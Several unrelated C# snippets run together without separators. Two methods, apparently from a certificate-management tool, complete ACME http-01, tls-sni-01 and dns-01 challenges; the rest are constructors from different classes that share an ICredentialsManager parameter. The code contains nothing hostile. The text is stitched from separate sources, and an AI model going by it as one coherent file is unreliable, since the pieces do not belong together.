public async Task <PendingAuthorization> PerformAutomatedChallengeResponse(ILog log, ICertifiedServer iisManager, ManagedCertificate managedCertificate, PendingAuthorization pendingAuth, ICredentialsManager credentialsManager) { var requestConfig = managedCertificate.RequestConfig; var domain = pendingAuth.Identifier.Dns; var challengeConfig = managedCertificate.GetChallengeConfig(domain); if (pendingAuth.Challenges != null) { // from list of possible challenges, select the one we prefer to attempt var requiredChallenge = pendingAuth.Challenges.FirstOrDefault(c => c.ChallengeType == challengeConfig.ChallengeType); if (requiredChallenge != null) { pendingAuth.AttemptedChallenge = requiredChallenge; if (requiredChallenge.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_HTTP) { // perform http-01 challenge response var check = await PerformChallengeResponse_Http01(log, iisManager, domain, managedCertificate, pendingAuth); if (requestConfig.PerformExtensionlessConfigChecks) { pendingAuth.AttemptedChallenge.ConfigCheckedOK = check.IsSuccess; } } if (requiredChallenge.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_SNI) { // perform tls-sni-01 challenge response var check = PrepareChallengeResponse_TlsSni01(log, iisManager, domain, managedCertificate, pendingAuth); if (requestConfig.PerformTlsSniBindingConfigChecks) { // set config check OK if all checks return true pendingAuth.AttemptedChallenge.ConfigCheckedOK = check(); } } if (requiredChallenge.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_DNS) { // perform dns-01 challenge response var check = await PerformChallengeResponse_Dns01(log, domain, managedCertificate, pendingAuth, isTestMode : false, credentialsManager); pendingAuth.AttemptedChallenge.IsFailure = !check.Result.IsSuccess; pendingAuth.AttemptedChallenge.ChallengeResultMsg = check.Result.Message; pendingAuth.AttemptedChallenge.IsAwaitingUser = check.IsAwaitingUser; pendingAuth.AttemptedChallenge.PropagationSeconds = check.PropagationSeconds; pendingAuth.IsFailure = !check.Result.IsSuccess; pendingAuth.AuthorizationError = check.Result.Message; } } } return(pendingAuth); }
internal Taxonomies(ICredentialsManager credentials, ITaxonomiesService taxonomies, ICacheService cacheService) { this.credentials = credentials; this.taxonomies = taxonomies; this.cacheService = cacheService; }
private async Task <DnsChallengeHelperResult> PerformChallengeResponse_Dns01(ILog log, string domain, ManagedCertificate managedCertificate, PendingAuthorization pendingAuth, bool isTestMode, ICredentialsManager credentialsManager) { var dnsChallenge = pendingAuth.Challenges.FirstOrDefault(c => c.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_DNS); if (dnsChallenge == null) { var msg = $"No dns-01 challenge to completed for {managedCertificate.Name}. Request cannot continue."; log.Warning(msg); return(new DnsChallengeHelperResult { Result = new ActionResult { IsSuccess = false, Message = msg }, IsAwaitingUser = false, PropagationSeconds = 0 }); } // create DNS records (manually or via automation) var dnsHelper = new DnsChallengeHelper(credentialsManager); var dnsResult = await dnsHelper.CompleteDNSChallenge(log, managedCertificate, domain, dnsChallenge.Key, dnsChallenge.Value, isTestMode); if (!dnsResult.Result.IsSuccess) { log.Error($"DNS update failed: {dnsResult.Result.Message}"); } else { log.Information($"DNS: {dnsResult.Result.Message}"); } var cleanupQueue = new List <Action> { }; // configure cleanup actions for use after challenge completes pendingAuth.Cleanup = async() => { _ = await dnsHelper.DeleteDNSChallenge(log, managedCertificate, domain, dnsChallenge.Key, dnsChallenge.Value); }; return(dnsResult); }
private CredentialsFormViewModel(ICredentialsManager credentialsManager) { m_CredentialsManager = credentialsManager; }
public MigrationManager(IItemManager itemManager, ICredentialsManager credentialsManager, ICertifiedServer targetServer) { _itemManager = itemManager; _credentialsManager = credentialsManager; _targetServer = targetServer; }
public Impersonator(ICredentialsManager credentialsManager) { _credentialsManager = DIHelper.VerifyParameter(credentialsManager); }